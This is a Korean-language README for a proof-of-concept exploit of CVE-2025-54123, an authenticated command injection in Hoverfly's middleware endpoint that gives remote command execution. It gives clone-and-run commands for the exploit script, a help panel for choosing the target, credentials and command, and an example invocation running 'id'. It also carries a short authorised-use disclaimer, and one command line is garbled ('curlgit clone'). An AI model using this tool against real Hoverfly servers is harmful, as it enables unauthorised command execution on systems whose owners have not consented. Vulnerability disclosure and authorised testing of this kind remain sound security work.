
PoC CVE-2025-54123 - Hoverfly <= 1.11.3 - 인증된 미들웨어 명령어 삽입
PoC CVE-2025-54123 - Hoverfly의 미들웨어 명령 주입
이 취약점은 Hoverfly 버전 ≤ 1.11.3에 영향을 미치며, 특히 /api/v2/hoverfly/middleware 엔드포인트를 대상으로 합니다. middleware.go, local_middleware.go, hoverfly_service.go를 포함한 여러 파일에서 입력 검증 및 소독 불충분으로 인해 발생합니다. script 매개변수에 제공된 사용자 제어 입력은 적절한 확인 없이 시스템 바이너리(예: /bin/bash)로 직접 전달되어, Hoverfly 프로세스의 권한으로 원격 명령 실행(RCE) 이 가능합니다.
curlgit clone https://github.com/f4dee-backup/CVE-2025-54123
cd CVE-2025-54123
chmod +x CVE-2025-54123.sh
./CVE-2025-54123.sh -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ███████╗██╗ ██╗ ██╗██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ ██╔════╝██║ ██║███║╚════██╗╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗███████╗███████║╚██║ █████╔╝ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚════██║╚════██║ ██║██╔═══╝ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ ███████║ ██║ ██║███████╗██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
Hoverfly <= 1.11.3 - Authenticated Middleware Command Injection
[?] 매개변수 설명:
-t 대상 기본 URL (예: http://target:8888)
-u 유효한 사용자 이름
-p 유효한 비밀번호
-c 실행할 명령 (큰따옴표로 묶어야 함)
-h 이 도움말 패널 표시
[i] 예시:
./CVE-2025-54123.sh -t http://target.com:8888 -u admin -p password -c "id"
이 익스플로잇은 교육 및 승인된 보안 테스트 목적으로만 사용됩니다.
명시적 허가 없이 시스템에 대해 이 도구를 사용하지 마십시오. 무단 액세스는 불법일 수 있습니다.
저자는 오용 또는 발생한 모든 손해에 대해 책임을 지지 않습니다.